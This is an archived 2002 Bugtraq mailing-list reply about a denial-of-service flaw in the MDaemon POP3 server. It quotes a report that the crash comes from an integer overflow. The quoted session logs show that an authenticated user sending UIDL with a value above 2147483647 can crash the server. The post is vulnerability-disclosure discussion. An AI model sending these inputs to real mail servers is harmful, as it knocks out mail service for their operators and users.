[27650] in bugtraq
RE: MDaemon SMTP/POP/IMAP server DoS
daemon@ATHENA.MIT.EDU (Robert Feldbauer)
Wed Oct 30 01:28:04 2002
Reply-To: <wuher@swrpg.net>
From: "Robert Feldbauer" <wuher@swrpg.net>
To: <bugtraq@securityfocus.com>
Date: Tue, 29 Oct 2002 11:30:46 -0500
Message-ID: <DMEHLMEHKDDEMOFNBKACMEBOCDAA.wuher@swrpg.net>
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
In-Reply-To: <PCENLIEJEGBOLCENLIEAKEPOECAA.basil.hussain@kodakweddings.com>
I'm running MDaemon 3.1.2 and this does not have any adverse effect.
Here's my log:
+OK daisydata.com POP3 server ready
<MDAEMON-F200210291127.AA274532MD3626@mydomain.com>
USER myusername
+OK myusername... Recipient ok
PASS mypassword
+OK myusername@mydomain.com's mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648
UIDL 2147483649
+OK -2147483647
UIDL 2147483650
+OK -2147483646
And it responds to "QUIT" just fine.
Bob Feldbauer
wuher@swrpg.net
> -----Original Message-----
> From: Basil Hussain [mailto:basil.hussain@kodakweddings.com]
> Sent: Tuesday, October 29, 2002 5:27 AM
> To: bugtraq@securityfocus.com
> Subject: RE: MDaemon SMTP/POP/IMAP server DoS
>
>
> Hi all,
>
> > Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
> > sending long arguments (32b and above) with DELE or UIDL commands.
> > To do this u must have at least mail-account on vulnerable host.
> > After geting long request from client, all MDaemon's Services will be
> > closed (smtp, imap, pop, (?)worldclient).
> > Here the log of attack on local MDaemon POP-server:
> >
> > +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
> > <MDAEMON-F200210
> > 271036.AA3656130MD0012@dark.ru>
> > USER D4rkGr3y
> > +OK D4rkGr3y... Recipient ok
> > PASS cool-pass
> > +OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets).
> > UIDL 11111111111111111111111111111111
>
> It would appear this is not an issue with the length of string passed to
> MDaemon, but rather an integer overflow problem. After some testing, I've
> discovered that if you pass any number greater than 2147483647 (the limit
> for a signed 4-byte integer), you either get an error or a
> complete crash of
> MDaemon. For example:
>
> +OK somedomain.com POP MDaemon 6.0.5 ready
> <MDAEMON-F200210290951.AA5138234MD2795@somedomain.com>
> USER blah
> +OK blah... Recipient ok
> PASS 123456
> +OK blah@somedomain.com's mailbox has 0 total messages (0 octets).
> UIDL 2147483647
> -ERR no such message
> UIDL 2147483648
> +OK -2147483648 !!! Index 0 is not used
> UIDL 2147483649
>
> [Connection lost at this point...]
>
> By the way, you may have noticed this also works with a slightly older
> release (6.0.5). Also, hostname and account details have been changed to
> protect the guilty... :-)
>
> Also, I don't know whether this was something with how my test W2K server
> was set up, but MDaemon would auto-restart afterwards, thus
> making this bug
> not so much of a show-stopper and limiting scope for a Denial-of-Service
> attack somewhat.
>
> Regards,
> Basil Hussain
